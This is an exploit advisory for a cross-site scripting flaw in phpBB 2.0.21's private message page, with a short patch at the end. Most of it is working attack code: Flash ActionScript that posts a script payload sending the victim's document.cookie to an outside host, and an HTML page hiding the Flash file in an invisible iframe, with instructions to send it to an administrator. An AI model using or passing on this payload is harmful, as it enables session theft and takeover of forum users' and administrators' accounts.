phpBB (privmsg.php) XSS Exploit By: Demential Web: http://headburn.altervista.org E-mail: info@xxxxxxxxxxx PhpBB website: http://phpbb.com Exploit tested on phpBB 2.0.21 Secunia.com said: Input passed to the form field "Message body" in privmsg.php is not properly sanitised before it is returned to the user when sending messages to a non-existent user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The Exploit: Create a Shockwave Flash file with this code: var username:String = "user_that_doesnt_exist"; var subject:String = "Xss Exploitation"; var message:String = "</textarea><script>document.location= 'http://site.com/cookie.php?c=' + document.cookie </script>"; var folder:String = "inbox"; var mode:String = "post"; var post:String = "Submit"; getURL("http://victim.com/phpBB2/privmsg.php";, "_self", "POST"); Put it into a web page: <html> <head> <title>Put a title here</title> </head> <body> <p>Put some text here<p> <iframe src="http://yoursite.com/exploit.swf"; frameborder="0" height="0" width="0"></iframe> </body> </html> And send it to the admin (or a normal user) users must be logged-in. Fixing: open phpBB2/privmsg.php find: if (!($to_userdata = $db->sql_fetchrow($result))) { $error = TRUE; $error_msg = $lang['No_such_user']; replace with: if (!($to_userdata = $db->sql_fetchrow($result))) { $error = TRUE; echo "Sorry, but no such user exists."; exit;
